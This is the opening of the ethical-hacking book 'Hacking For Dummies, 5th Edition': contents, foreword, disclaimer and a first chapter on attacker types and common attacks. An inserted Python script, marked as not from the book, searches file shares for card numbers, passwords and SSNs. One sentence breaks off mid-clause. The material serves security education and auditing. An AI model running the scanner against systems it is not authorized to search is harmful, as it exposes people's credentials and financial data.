Hacking For Dummies - Kevin Beaver
Hacking For Dummies, 5th Edition
Published by: John Wiley & Sons, Inc., 111 River Street, Hoboken, NJ 07030-5774, www.wiley.com
Copyright © 2016 by John Wiley & Sons, Inc., Hoboken, New Jersey
Published simultaneously in Canada
Library of Congress Control Number: 2015956627
ISBN 978-1-119-15468-6 (pbk); ISBN 978-1-119-15469-3 (ebk); ISBN 978-1-119-15470-9 (ebk)
Hacking For Dummies®
Visit www.dummies.com/cheatsheet/hacking to view this book’s cheat sheet.
Table of Contents
Cover
Foreword
Introduction
  Who Should Read This Book?
  About This Book
  How to Use This Book
  What You Don’t Need to Read
  Foolish Assumptions
  How This Book Is Organized
  Icons Used in This Book
  Where to Go from Here
Part I: Building the Foundation for Security Testing
  Chapter 1: Introduction to Ethical Hacking
    Straightening Out the Terminology
    Recognizing How Malicious Attackers Beget Ethical Hackers
    Understanding the Need to Hack Your Own Systems
    Understanding the Dangers Your Systems Face
    Obeying the Ethical Hacking Principles
    Using the Ethical Hacking Process
  Chapter 2: Cracking the Hacker Mindset
    What You’re Up Against
    Who Breaks into Computer Systems
    Why They Do It
    Planning and Performing Attacks
    Maintaining Anonymity
  Chapter 3: Developing Your Ethical Hacking Plan
    Establishing Your Goals
    Determining Which Systems to Hack
    Creating Testing Standards
    Selecting Security Assessment Tools
  Chapter 4: Hacking Methodology
    Setting the Stage for Testing
    Seeing What Others See
    Scanning Systems
    Determining What’s Running on Open Ports
    Assessing Vulnerabilities
    Penetrating the System
Part II: Putting Security Testing in Motion
  Chapter 5: Information Gathering
    Gathering Public Information
    Mapping the Network
  Chapter 6: Social Engineering
    Introducing Social Engineering
    Starting Your Social Engineering Tests
    Why Attackers Use Social Engineering
    Understanding the Implications
    Performing Social Engineering Attacks
    Social Engineering Countermeasures
  Chapter 7: Physical Security
    Identifying Basic Physical Security Vulnerabilities
    Pinpointing Physical Vulnerabilities in Your Office
  Chapter 8: Passwords
    Understanding Password Vulnerabilities
    Cracking Passwords
    General Password Cracking Countermeasures
    Securing Operating Systems
Part III: Hacking Network Hosts
  Chapter 9: Network Infrastructure Systems
    Understanding Network Infrastructure Vulnerabilities
    Choosing Tools
    Scanning, Poking, and Prodding the Network
    Detecting Common Router, Switch, and Firewall Weaknesses
    Putting Up General Network Defenses
  Chapter 10: Wireless Networks
    Understanding the Implications of Wireless Network Vulnerabilities
    Choosing Your Tools
    Discovering Wireless Networks
    Discovering Wireless Network Attacks and Taking Countermeasures
  Chapter 11: Mobile Devices
    Sizing Up Mobile Vulnerabilities
    Cracking Laptop Passwords
    Cracking Phones and Tablets
Part IV: Hacking Operating Systems
  Chapter 12: Windows
    Introducing Windows Vulnerabilities
    Choosing Tools
    Gathering Information About Your Windows Vulnerabilities
    Detecting Null Sessions
    Checking Share Permissions
    Exploiting Missing Patches
    Running Authenticated Scans
  Chapter 13: Linux
    Understanding Linux Vulnerabilities
    Choosing Tools
    Gathering Information About Your Linux Vulnerabilities
    Finding Unneeded and Unsecured Services
    Securing the .rhosts and hosts.equiv Files
    Assessing the Security of NFS
    Checking File Permissions
    Finding Buffer Overflow Vulnerabilities
    Checking Physical Security
    Performing General Security Tests
    Patching Linux
Part V: Hacking Applications
  Chapter 14: Communication and Messaging Systems
    Introducing Messaging System Vulnerabilities
    Recognizing and Countering E-Mail Attacks
    Understanding Voice over IP
  Chapter 15: Web Applications and Mobile Apps
    Choosing Your Web Security Testing Tools
    Seeking Out Web Vulnerabilities
    Minimizing Web Security Risks
    Uncovering Mobile App Flaws
  Chapter 16: Databases and Storage Systems
    Diving Into Databases
    Following Best Practices for Minimizing Database Security Risks
    Opening Up About Storage Systems
    Following Best Practices for Minimizing Storage Security Risks
Part VI: Security Testing Aftermath
  Chapter 17: Reporting Your Results
    Pulling the Results Together
    Prioritizing Vulnerabilities
    Creating Reports
  Chapter 18: Plugging Security Holes
    Turning Your Reports into Action
    Patching for Perfection
    Hardening Your Systems
    Assessing Your Security Infrastructure
  Chapter 19: Managing Security Processes
    Automating the Ethical Hacking Process
    Monitoring Malicious Use
    Outsourcing Security Assessments
    Instilling a Security-Aware Mindset
    Keeping Up with Other Security Efforts
Part VII: The Part of Tens
  Chapter 20: Ten Tips for Getting Security Buy-In
    Cultivate an Ally and a Sponsor
    Don’t Be a FUDdy Duddy
    Demonstrate How the Organization Can’t Afford to Be Hacked
    Outline the General Benefits of Security Testing
    Show How Security Testing Specifically Helps the Organization
    Get Involved in the Business
    Establish Your Credibility
    Speak on Management’s Level
    Show Value in Your Efforts
    Be Flexible and Adaptable
  Chapter 21: Ten Reasons Hacking Is the Only Effective Way to Test
    The Bad Guys Think Bad Thoughts, Use Good Tools, and Develop New Methods
    IT Governance and Compliance Are More than High-Level Checklist Audits
    Hacking Complements Audits and Security Evaluations
    Customers and Partners Will Ask, ‘How Secure Are Your Systems?’
    The Law of Averages Works Against Businesses
    Security Assessments Improve the Understanding of Business Threats
    If a Breach Occurs, You Have Something to Fall Back On
    In-Depth Testing Brings Out the Worst in Your Systems
    Combining the Best of Penetration Testing and Vulnerability Assessments Is What You Need
    Proper Testing Can Uncover Weaknesses That Might Go Overlooked for Years
  Chapter 22: Ten Deadly Mistakes
    Not Getting Prior Approval
    Assuming You Can Find All Vulnerabilities During Your Tests
    Assuming You Can Eliminate All Security Vulnerabilities
    Performing Tests Only Once
    Thinking You Know It All
    Running Your Tests Without Looking at Things from a Hacker’s Viewpoint
    Not Testing the Right Systems
    Not Using the Right Tools
    Pounding Production Systems at the Wrong Time
    Outsourcing Testing and Not Staying Involved
Appendix: Tools and Resources
  Advanced Malware
  Bluetooth
  Certifications
  Databases
  Denial of Service Protection
  Exploits
  General Research Tools
  Hacker Stuff
  Keyloggers
  Laws and Regulations
  Linux
  Live Toolkits
  Log Analysis
  Messaging
  Miscellaneous
  Mobile
  Networks
  Password Cracking
  Patch Management
  Security Education and Learning Resources
  Security Methods and Models
  Social Engineering and Phishing
  Source Code Analysis
  Statistics
  Storage
  System Hardening
  User Awareness and Training
  Voice over IP
  Vulnerability Databases
  Websites and Applications
  Windows
  Wireless Networks
About the Author
Cheat Sheet
Connect with Dummies
End User License Agreement
Foreword

There were no books on hacking when I became a penetration tester and security auditor for PricewaterhouseCoopers in 1995. There were tools, techniques, and procedures, though. While the tools have changed dramatically, the techniques and procedures have been remarkably stable, and Kevin Beaver has created the perfect introduction to hacking that incorporates the best procedures with the latest tools. Planning, footprint analysis, scanning, and attacking are all still required. Perhaps there is more emphasis on wireless and web hacking and less on things such as war dialing thanks to changes in the way companies and people are connected. The real value to extract from this book is in understanding the tools and becoming proficient in their use.

Pentesting, or hacking, is the best way to get into the rewarding field of IT security. It is open to anyone with a foundation in computing, coding, or networking. If you do not have a background in all three, you will quickly gain knowledge in the other disciplines because hacking takes you down many paths.

There was a time when a professional hacker had to be a jack-of-all-trades. Now there are thousands of subspecialties within the realm of hacking: mobile app security testing, web app security testing, network penetration, and OS-specific hacking for Mac OS X, Windows, Linux, and Android. Security researchers, specialists who discover new vulnerabilities, are having a big impact on the so-called Internet of Things (IoT) as they discover new ways to hack medical devices, automobiles, airplanes, and industrial control systems, which makes this field that much more exciting and relevant.

Hacking appeals to a special kind of person. Tinkerers, inventors, and just those who are fascinated by the way things work get into IT security through the hacking door.

As Kevin explains though, hacking as a profession requires discipline and careful record keeping, perhaps the hardest part for the sometimes brilliant amateur hackers—the ones who will stay glued to their consoles for 24 hours, scripting attacks and wending their way through a network until they hit gold.

For me, the most interesting type of hacking is what I have termed business process hacking. When formalized, business process hacking is an example of what Kevin calls knowledge-based hacking. It is best performed with an insider’s knowledge of architectures and technology and, most important, the business process. This is where you discover flaws in the way a business is built. Is there a third-party payment processor in the loop of an e-commerce site? Can a subscriber to an information resource abuse his access in ways a hacker cannot? Where are the “trust interfaces?” Is the only control at those interfaces: “We trust the user/system/supplier not to hack us?”

You see business process hacking every day. So-called Search Engine Optimization (SEO) experts figure out how to hack Google’s page rank algorithms and controls. Tickets to popular concerts and sporting events are sold out in minutes to bots that scarf them up for resale at a profit. Amazon sales ranks are hacked by authors who purchase their own books in quantity.

This book is your introduction to the challenging and engaging world of hacking IT systems. I predict three things:
1. Hacking will accelerate your career as you gain invaluable experience and become indispensable to your organization.
2. New doors will open for you. You will find that you have many options. You can join (or form) a consulting firm. You can move up the ranks inside your organization, perhaps to becoming the Chief Information Security Officer. You can join a vendor that designs and sells security tools in which you have gained proficiency.
3. You will never stop learning. Hacking is one of the few fields where you are never done.

Richard Stiennon
Chief Research Analyst, IT-Harvest
Author of There Will Be Cyberwar
Introduction

Welcome to Hacking For Dummies, 5th Edition. This book outlines—in plain English—computer hacker tricks and techniques that you can use to assess the security of your information systems, find the vulnerabilities that matter, and fix the weaknesses before criminal hackers and malicious insiders take advantage of them. This hacking is the professional, aboveboard, and legal type of security testing—which I often refer to as ethical hacking throughout the book.

Computer and network security is a complex subject and an ever-moving target. You must stay on top of it to ensure that your information is protected from the bad guys. That’s where the techniques and tools outlined in this book can help.

You can implement all the security technologies and other best practices possible, and your information systems might be secure—as far as you know. However, until you understand how malicious attackers think, apply that knowledge, and use the right tools to assess your systems from their point of view, it’s practically impossible to have a true sense of how secure your information really is.

Ethical hacking, or more simply, “security assessments”—which encompasses formal and methodical penetration testing, white hat hacking, and vulnerability testing—is necessary to find security flaws and to help validate that your information systems are truly secure on an ongoing basis. This book provides you with the knowledge to implement a security assessment program successfully, perform proper security checks, and put the proper countermeasures in place to keep external hackers and malicious users in check.

Who Should Read This Book?

Disclaimer: If you choose to use the information in this book to hack or break into computer systems maliciously and without authorization, you’re on your own. Neither I (the author) nor anyone else associated with this book shall be liable or responsible for any unethical or criminal choices that you might make and execute using the methodologies and tools that I describe. This book is intended solely for information technology (IT) and information security professionals to test information security—either on your own systems or on a client’s systems—in an authorized fashion.

Okay, now that that’s out of the way, it’s time for the good stuff! This book is for you if you’re a network administrator, information security manager, security consultant, security auditor, compliance manager, or otherwise interested in finding out more about testing computer systems and IT operations to make things more secure.

As the person performing well-intended information security assessments, you can detect and point out security holes that might otherwise be overlooked. If you’re performing these tests on your systems, the information you uncover in your tests can help you win over management and prove that information security really is a business issue to be taken seriously. Likewise, if you’re performing these tests for your clients, you can help find security holes that can be plugged before the bad guys have a chance to exploit them.

The information in this book helps you stay on top of the security game and enjoy the fame and glory of helping your organization and clients prevent bad things from happening to their information and network environment.
About This Book

Hacking For Dummies, 5th Edition, is a reference guide on hacking your systems to improve security and help minimize business risks. The security testing techniques are based on written and unwritten rules of computer system penetration testing, vulnerability testing, and information security best practices. This book covers everything from establishing your hacking plan to testing your systems to plugging the holes and managing an ongoing security testing program. Realistically, for many networks, operating systems, and applications, thousands of possible hacks exist. I don’t cover them all but I do cover the major ones on various platforms and systems that I believe contribute to the most security problems in business today. Whether you need to assess security vulnerabilities on a small home office network, a medium-sized corporate network, or across large enterprise systems, Hacking For Dummies, 5th Edition, provides the information you need.

How to Use This Book

This book includes the following features:
Various technical and nontechnical tests and their detailed methodologies
Specific countermeasures to protect against hacking

Before you start testing your systems, familiarize yourself with the information in Part I so you’re prepared for the tasks at hand. The adage “if you fail to plan, you plan to fail” rings true for the ethical hacking process. You must have a solid game plan in place if you’re going to be successful.

What You Don’t Need to Read

Depending on your computer and network configurations, you may be able to skip chapters. For example, if you aren’t running Linux or wireless networks, you can skip those chapters. Just be careful. You may think you’re not running certain systems, but they could very well be on your network, somewhere, waiting to be exploited.

Foolish Assumptions

I make a few assumptions about you, the aspiring IT or security professional:
You are familiar with basic computer-, network-, and information-security concepts and terms.
You have access to a computer and a network on which to use these techniques and tools.
You have permission to perform the hacking techniques described in this book.

How This Book Is Organized

This book is organized into seven modular parts, so you can jump around from one part to another as needed. Each chapter provides practical methodologies and practices you can use as part of your security testing efforts, including checklists and references to specific tools you can use, as well as resources on the Internet.
Part I: Building the Foundation for Security Testing

This part covers the fundamental aspects of security assessments. It starts with an overview of the value of ethical hacking and what you should and shouldn’t do during the process. You get inside the malicious mindset and discover how to plan your security testing efforts. This part covers the steps involved in the ethical hacking process, including how to choose the proper tools.

Part II: Putting Security Testing in Motion

This part gets you rolling with the security testing process. It covers several well-known and widely used hack attacks, including information gathering, social engineering, and cracking passwords, to get your feet wet. This part covers the human and physical elements of security, which tend to be the weakest links in any information security program. After you plunge into these topics, you’ll know the tips and tricks required to perform common general security tests against your systems, as well as specific countermeasures to keep your information systems secure.

Part III: Hacking Network Hosts

Starting with the larger network in mind, this part covers methods to test your systems for various well-known network infrastructure vulnerabilities. From weaknesses in the TCP/IP protocol suite to wireless network insecurities, you find out how networks are compromised by using specific methods of flawed network communications, along with various countermeasures that you can implement to avoid becoming a victim. I then delve down into mobile devices and show how smartphones, tablets, and the like can be exploited.

Part IV: Hacking Operating Systems

Practically all operating systems have well-known vulnerabilities that hackers often exploit. This part jumps into hacking the widely-used operating systems: Windows and Linux. The hacking methods include scanning your operating systems for vulnerabilities and enumerating the specific hosts to gain detailed information. This part also includes information on exploiting well-known vulnerabilities in these operating systems, taking over operating systems remotely, and specific countermeasures that you can implement to make your operating systems more secure.

Part V: Hacking Applications

Application security is a critical area of focus these days. An increasing number of attacks—which are often able to bypass firewalls, intrusion prevention systems, and antivirus software—are aimed directly at web, mobile, and related applications. This part discusses hacking specific business applications, including coverage of messaging systems, web applications, mobile apps, and databases, along with practical countermeasures that you can put in place to make your systems more secure.

Part VI: Security Testing Aftermath

After you perform your security testing, what do you do with the information you gather? Shelve it? Show it off? How do you move forward? This part answers these questions and more. From developing reports for management to remediating the security flaws that you discover to establishing procedures for your ongoing vulnerability testing efforts, this part brings the security assessment process full circle. This information not only ensures that your effort and time are well spent, but also is evidence that information security is an essential element for success in any business that depends on computers and information technology.

Part VII: The Part of Tens

This part contains tips to help ensure the success of your information security program. You find out how to get management to buy into your program so you can get going and start protecting your systems. This part also includes the top ten ethical hacking mistakes you absolutely must avoid.

The appendix, which also appears in this part, provides a one-stop reference listing of ethical hacking tools and resources.
Icons Used in This Book

This icon points out information that is worth committing to memory.
This icon points out information that could have a negative impact on your ethical hacking efforts—so please read it!
This icon refers to advice that can help highlight or clarify an important point.
This icon points out technical information that is interesting but not vital to your understanding of the topic being discussed.

Where to Go from Here

The more you know about how external hackers and rogue insiders work and how your systems should be tested, the better you’re able to secure your computer and network systems. This book provides the foundation that you need to develop and maintain a successful security assessment program in order to minimize business risks.

Keep in mind that the high-level concepts of security testing won’t change as often as the specific vulnerabilities you protect against. Ethical hacking will always remain both an art and a science in a field that’s ever-changing. You must keep up with the latest hardware and software technologies, along with the various vulnerabilities that come about month after month and year after year.

You won’t find a single best way to hack your systems, so tweak this information to your heart’s content and, as I’ve always said, happy hacking!
Building the Foundation for Security Testing
In this part…

Your mission is to find the holes in your network so you can fix them before the bad guys exploit them. It’s that simple. This mission will be fun, educational, and most likely entertaining. It will certainly be an eye-opening experience. The cool part is that you can emerge as the hero, knowing that your organization will be better protected against malicious hackers and insider attacks and less likely to experience a breach and have its name smeared across the headlines.

If you’re new to security testing, this is the place to begin. The chapters in this part get you started with information on what to do and how to do it when you’re hacking your own systems. Oh, and you find out what not to do as well. This information will guide you through building the foundation for your security testing program. This foundation will keep you on the right path and off any one-way dead-end streets. This mission is indeed possible—you just have to get your ducks in a row first.

Introduction to Ethical Hacking

In This Chapter
Understanding hackers’ and malicious users’ objectives
Examining how the ethical hacking process came about
Understanding the dangers your computer systems face
Starting to use the ethical hacking process for security testing

This book is about testing your computers and networks for security vulnerabilities and plugging the holes you find before the bad guys get a chance to exploit them.
Straightening Out the Terminology

Most people have heard of hackers and malicious users. Many have even suffered the consequences of their criminal actions. So who are these people? And why do you need to know about them? The next few sections give you the lowdown on these attackers.

In this book, I use the following terminology:

Hackers (or external attackers) try to compromise computers, sensitive information, and even entire networks for ill-gotten gains—usually from the outside—as unauthorized users. Hackers go for almost any system they think they can compromise. Some prefer prestigious, well-protected systems, but hacking into anyone’s system increases an attacker’s status in hacker circles.

Malicious users (or internal attackers) try to compromise computers and sensitive information from the inside as authorized and “trusted” users. Malicious users go for systems they believe they can compromise for ill-gotten gains or revenge.

Malicious attackers are, generally speaking, both hackers and malicious users. For the sake of simplicity, I refer to both as hackers and specify hacker or malicious user only when I need to differentiate and drill down further into their unique tools, techniques, and ways of thinking.

Ethical hackers (or good guys) hack systems to discover vulnerabilities to protect against unauthorized access, abuse, and misuse. Information security researchers, consultants, and internal staff fall into this category.

Defining hacker

Hacker has two meanings:
Traditionally, hackers like to tinker with software or electronic systems. Hackers enjoy exploring and learning how computer systems operate. They love discovering new ways to work—both mechanically and electronically.
In recent years, hacker has taken on a new meaning—someone who maliciously breaks into systems for personal gain. Technically, these criminals are crackers (criminal hackers). Crackers break into, or crack, systems with malicious intent. The gain they seek could be fame, intellectual property, profit, or even revenge. They modify, delete, and steal critical information as well as take entire networks offline, often bringing large corporations and government agencies to their knees.

The good-guy (white hat) hackers don’t like being lumped in the same category as the bad-guy (black hat) hackers. (In case you’re curious, the white hat and black hat terms come from old Western TV shows in which the good guys wore white cowboy hats and the bad guys wore black cowboy hats.) Gray hat hackers are a little bit of both.

Whatever the case, most people have a negative connotation of the word hacker.

Many malicious hackers claim that they don’t cause damage but instead help others for the “greater good” of society. Yeah, right. Malicious hackers are electronic miscreants and deserve the consequences of their actions.

Be careful not to confuse criminal hackers with security researchers. Researchers not only hack aboveboard and develop the amazing tools that we get to use in our work, but also they (usually) take responsible steps to disclose their findings and publish their code.

Defining malicious user

Malicious user—meaning a rogue employee, contractor, intern, or other user who abuses his or her trusted privileges—is a common term in security circles and in headlines about information breaches. The issue isn’t necessarily users “hacking” internal systems, but rather users who abuse the computer access privileges they’ve been given. Users ferret through critical database systems to glean sensitive information, e-mail confidential client information to the competition or elsewhere to the cloud, or delete sensitive files from servers that they probably didn’t need to have access to in the first place. There’s also the occasional ignorant insider whose intent is not malicious but who still causes security problems by moving, deleting, or corrupting sensitive information. Even an innocent “fat-finger” on the keyboard can have dire consequences in the business world.

Malicious users are often the worst enemies of IT and information security professionals because they know exactly where to go to get the goods and don’t need to be computer savvy to compromise sensitive information. These users have the access they need and the management trusts them—often without question.

So, what about that Edward Snowden guy—the former National Security Agency employee who ratted out his own employer? That’s a complicated subject and I talk about hacker motivations in Chapter 2. Regardless of what you think of Snowden, he abused his authority and violated the terms of his non-disclosure agreement.
Recognizing How Malicious Attackers Beget Ethical Hackers

You need protection from hacker shenanigans; you have to become as savvy as the guys trying to attack your systems. A true security assessment professional possesses the skills, mindset, and tools of a hacker but is also trustworthy. He or she performs the hacks as security tests against systems based on how hackers might work.

Ethical hacking—which encompasses formal and methodical penetration testing, white hat hacking, and vulnerability testing—involves the same tools, tricks, and techniques that criminal hackers use, but with one major difference: Ethical hacking is performed with the target’s permission in a professional setting. The intent of ethical hacking is to discover vulnerabilities from a malicious attacker’s viewpoint to better secure systems. Ethical hacking is part of an overall information risk management program that allows for ongoing security improvements. Ethical hacking can also ensure that vendors’ claims about the security of their products are legitimate.

If you perform ethical hacking tests and want to add another certification to your credentials, you might want to consider becoming a Certified Ethical Hacker (C|EH) through a certification program sponsored by EC-Council. See www.eccouncil.org for more information. Like the Certified Information Systems Security Professional (CISSP), the C|EH certification has become a well-known and respected certification in the industry. It’s even accredited by the American National Standards Institute (ANSI 17024). Other options include the SANS Global Information Assurance Certification (GIAC) program and the Offensive Security Certified Professional (OSCP) program—a completely hands-on security testing certification. I love that approach as all too often, people performing this type of work don’t have the proper hands-on experience to do it well. See www.giac.org and www.offensive-security.com for more information.

Ethical hacking versus auditing

Many people confuse security testing via the ethical hacking approach with security auditing, but there are big differences, namely in the objectives. Security auditing involves comparing a company’s security policies (or compliance requirements) to what’s actually taking place. The intent of security auditing is to validate that security controls exist—typically using a risk-based approach. Auditing often involves reviewing business processes and, in many cases, might not be very technical. I often refer to security audits as security checklists because they’re usually based on (you guessed it) checklists.

Not all audits are high-level, but many of the ones I’ve seen (especially around PCI DSS [Payment Card Industry Data Security Standard] compliance) are quite simplistic—often performed by people who have no technical computer, network, and application experience or, worse, they work outside of IT altogether!

Conversely, security assessments based around ethical hacking focus on vulnerabilities that can be exploited. This testing approach validates that security controls do not exist or are ineffectual at best. Ethical hacking can be both highly technical and nontechnical, and although you do use a formal methodology, it tends to be a bit less structured than formal auditing. Where auditing is required (such as for the ISO 9001 and 27001 certifications) in your organization, you might consider integrating the ethical hacking techniques I outline in this book into your IT/security audit program. They complement one another really well.

Policy considerations

If you choose to make ethical hacking an important part of your business’s information risk management program, you really need to have a documented security testing policy. Such a policy outlines who’s doing the testing, the general type of testing that is performed, and how often the testing takes place. Specific procedures for carrying out your security tests could outline the methodologies I cover in this book. You might also consider creating a security standards document that outlines the specific security testing tools that are used and specific people performing the testing. You might also list standard testing dates, such as once per quarter for external systems and biannual tests for internal systems—whatever works for your business.

Compliance and regulatory concerns

Your own internal policies might dictate how management views security testing, but you also need to consider the state, federal, and international laws and regulations that affect your business. In particular, the Digital Millennium Copyright Act (DMCA) sends chills down the spines of legitimate researchers. See www.eff.org/issues/dmca for everything the DMCA has to offer.

Many of the federal laws and regulations in the United States—such as the Health Insurance Portability and Accountability Act (HIPAA), Health Information Technology for Economic and Clinical Health (HITECH) Act, Gramm-Leach-Bliley Act (GLBA), North American Electric Reliability Corporation (NERC) Critical Infrastructure Protection (CIP) requirements, and PCI DSS—require strong security controls and consistent security evaluations. Related international laws such as the Canadian Personal Information Protection and Electronic Documents Act (PIPEDA), the European Union’s Data Protection Directive, and Japan’s Personal Information Protection Act (JPIPA) are no different. Incorporating your security tests into these compliance requirements is a great way to meet the state and federal regulations and
Understanding the Need to Hack Your Own Systems
To catch a thief, you must think like a thief. That's the basis for ethical hacking. Knowing your enemy is absolutely critical. The law of averages works against security. With the increased number of hackers and their expanding knowledge, and the growing number of system vulnerabilities and other unknowns, eventually all computer systems and applications will be hacked or compromised in some way. Protecting your systems from the bad guys, and not just from the generic vulnerabilities that everyone knows about, is absolutely critical. When you know hacker tricks, you find out how vulnerable your systems really are.
Hacking preys on weak security practices and undisclosed vulnerabilities. More and more research, such as the annual Verizon Data Breach Investigations Report (www.verizonenterprise.com/DBIR), is showing that long-standing, known vulnerabilities are also being targeted. Firewalls, encryption, and passwords can create a false feeling of safety. These security systems often focus on high-level vulnerabilities, such as basic access control, without affecting how the bad guys work. Attacking your own systems to discover vulnerabilities, especially the low-hanging fruit that gets so many people into trouble, helps make them more secure. Ethical hacking is a proven method of greatly hardening your systems from attack. If you don't identify weaknesses, it's only a matter of time before the vulnerabilities are exploited.
As hackers expand their knowledge, so should you. You must think like them and work like them to protect your systems from them. As the ethical hacker, you must know the activities that hackers carry out and how to stop their efforts. Knowing what to look for and how to use that information helps you to thwart hackers' efforts.
You don't have to protect your systems from everything. You can't. The only protection against everything is to unplug your computer systems and lock them away so no one can touch them, not even you. But doing so is not the best approach to information security, and it's certainly not good for business! What's important is to protect your systems from known vulnerabilities and common attacks, which happen to be some of the most overlooked weaknesses in most organizations.
Anticipating all the possible vulnerabilities you'll have in your systems and business processes is impossible. You certainly can't plan for all types of attacks, especially the unknown ones. However, the more combinations you try and the more you test whole systems instead of individual units, the better your chances are of discovering vulnerabilities that affect your information systems in their entirety.
Don't take your security testing too far, though; hardening your systems from unlikely attacks makes little sense. For instance, if you don't have a lot of foot traffic in your office and no internal web server running, you might not have as much to worry about as a cloud service provider might have.
Your overall goals for security testing are to
Prioritize your systems so you can focus your efforts on what matters.
Hack your systems in a nondestructive fashion.
Enumerate vulnerabilities and, if necessary, prove to management that vulnerabilities exist and can be exploited.
Apply results to remove the vulnerabilities and better secure your systems.
Understanding the Dangers Your Systems Face
It's one thing to know generally that your systems are under fire from hackers around the world and malicious users around the office; it's another to understand the specific attacks against your systems that are possible. This section discusses some well-known attacks but is by no means a comprehensive listing.
Many security vulnerabilities aren't critical by themselves. However, exploiting several vulnerabilities at the same time can take its toll on a system or network environment. For example, a default Windows OS configuration, a weak SQL Server administrator password, or a server hosted on a wireless network might not be major security concerns by themselves, but someone exploiting all three of these vulnerabilities at the same time could lead to sensitive information disclosure and more.
Complexity is the enemy of security.
The possible vulnerabilities and attacks have grown enormously in recent years because of virtualization, cloud computing, and even social media. These three things alone have added immeasurable complexity to your IT environment.
Nontechnical attacks
Exploits that involve manipulating people, end users and even yourself, are the greatest vulnerability within any computer or network infrastructure. Humans are trusting by nature, which can lead to social engineering exploits. Social engineering is the exploitation of the trusting nature of human beings to gain information, often via e-mail phishing, for malicious purposes. Check out Chapter 6 for more information about social engineering and how to guard your systems against it.
Other common and effective attacks against information systems are physical. Hackers break into buildings, computer rooms, or other areas containing critical information or property to steal computers, servers, and other valuable equipment. Physical attacks can also include dumpster diving: rummaging through trash cans and dumpsters for intellectual property, passwords, network diagrams, and other information.
Network infrastructure attacks
Attacks against network infrastructures can be easy to accomplish because many networks can be reached from anywhere in the world via the Internet. Some examples of network infrastructure attacks include the following:
Connecting to a network through an unsecured wireless access point attached behind a firewall
Exploiting weaknesses in network protocols, such as TCP/IP and Secure Sockets Layer (SSL)
Flooding a network with too many requests, creating a denial of service (DoS) for legitimate requests
Installing a network analyzer on a network segment and capturing every packet that travels across it, revealing confidential information in cleartext
Operating system attacks
Hacking an operating system (OS) is a preferred method of the bad guys. OS attacks make up a large portion of attacks simply because every computer has an operating system, and OSes are susceptible to many well-known exploits, including vulnerabilities that remain unpatched years later.
Occasionally, some operating systems that tend to be more secure out of the box, such as the old-but-still-out-there Novell NetWare, OpenBSD, and IBM Series i, are attacked, and vulnerabilities turn up. But hackers tend to prefer attacking Windows, Linux, and, more recently, Mac OS X, because they're more widely used.
Here are some examples of attacks on operating systems:
Exploiting missing patches
Attacking built-in authentication systems
Breaking file system security
Cracking passwords and weak encryption implementations
Application and other specialized attacks
Applications take a lot of hits by hackers. Programs (such as e-mail server software and web applications) are often beaten down. For example:
Hypertext Transfer Protocol (HTTP) and Simple Mail Transfer Protocol (SMTP) applications are frequently attacked because most firewalls and other security mechanisms are configured to allow full access to these services to and from the Internet, even when running with SSL (yuck!) or Transport Layer Security (TLS) encryption.
Mobile apps face increasing attacks given their prevalence in business settings.
Unsecured files containing sensitive information are scattered across workstation and server shares.
Database systems also contain numerous vulnerabilities that malicious users can exploit.
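The "unsecured files scattered across shares" item above is something you can enumerate yourself before an insider or an intruder does. The following is an added example (my own code, not from the book or from any tool it names) that walks a directory tree and flags files containing card numbers that pass a Luhn check, password assignments left in notes, or US SSN-shaped strings. The sample files it builds are constructed test data, and the regular expressions, labels and file names are my assumptions.

```python
"""Find files on a share that leak sensitive data (added example, not from the book).

The regular expressions and labels are my own choices; the sample files are
constructed test data, not real records.
"""
import re
import shutil
import tempfile
from pathlib import Path

# 13-16 digit runs, optionally separated by spaces or dashes (card numbers)
CARD_RE = re.compile(r"(?<!\d)(?:\d[ -]?){13,16}(?!\d)")
# "password=..." / "pwd: ..." style assignments left in notes and scripts
PASSWORD_RE = re.compile(r"(?i)\b(?:password|passwd|pwd)\s*[:=]\s*\S+")
# US Social Security number shape; a shape check only, not a validity check
SSN_RE = re.compile(r"\b\d{3}-\d{2}-\d{4}\b")


def luhn_ok(digits: str) -> bool:
    """Luhn checksum; cuts false positives from order numbers and other IDs."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:                      # double every second digit from the right
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0


def classify_text(text: str) -> set:
    """Return the set of sensitive-data labels found in a piece of text."""
    labels = set()
    for match in CARD_RE.finditer(text):
        digits = re.sub(r"\D", "", match.group())
        if luhn_ok(digits):
            labels.add("card-number")
    if PASSWORD_RE.search(text):
        labels.add("password")
    if SSN_RE.search(text):
        labels.add("ssn")
    return labels


def scan_tree(root: str, max_bytes: int = 1_000_000) -> dict:
    """Map each file (relative POSIX path) under root to the labels found in it.

    Only the first max_bytes of each file are examined and undecodable bytes
    are ignored, so binaries and huge logs do not stall the scan.
    """
    findings = {}
    base = Path(root)
    for path in base.rglob("*"):
        if not path.is_file():
            continue
        try:
            text = path.read_bytes()[:max_bytes].decode("utf-8", "ignore")
        except OSError:
            continue                        # unreadable file: skip it, keep going
        labels = classify_text(text)
        if labels:
            findings[path.relative_to(base).as_posix()] = labels
    return findings


def build_sample_tree() -> str:
    """Create a throwaway directory of constructed sample files (not real data)."""
    root = tempfile.mkdtemp(prefix="share-")
    samples = {
        "finance/refunds.csv": "name,card\nJ. Doe,4111 1111 1111 1111\n",  # Luhn-valid test number
        "it/backup-notes.txt": "Old router: admin / password=Summer2016\n",
        "hr/roster.txt": "Jane Roe 123-45-6789\n",
        "marketing/plan.txt": "Q3 plan: order 1234567890123 units\n",     # 13 digits, Luhn fails
    }
    for rel, content in samples.items():
        path = Path(root, rel)
        path.parent.mkdir(parents=True, exist_ok=True)
        path.write_text(content, encoding="utf-8")
    return root


def remove_sample_tree(root: str) -> None:
    shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    share = build_sample_tree()
    try:
        for rel_path, labels in sorted(scan_tree(share).items()):
            print(f"{rel_path}: {', '.join(sorted(labels))}")
    finally:
        remove_sample_tree(share)
```

Point scan_tree at a mounted share instead of the sample tree to use it for real. The Luhn check is what keeps the marketing file out of the report: a bare 13-digit run is not evidence of a card number, and a scanner that reports every long number trains people to ignore its output.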
Obeying the Ethical Hacking Principles
Security professionals must carry out the same attacks against computer systems, physical controls, and people that malicious hackers do. (I introduce those attacks in the preceding section.) A security professional's intent, however, is to highlight any associated weaknesses. Parts II through V of this book cover how you might proceed with these attacks in detail, along with specific countermeasures you can implement against attacks against your business.
To ensure his or her security testing is performed adequately and professionally, every security professional must abide by a few basic tenets. The following sections introduce the principles you need to follow.
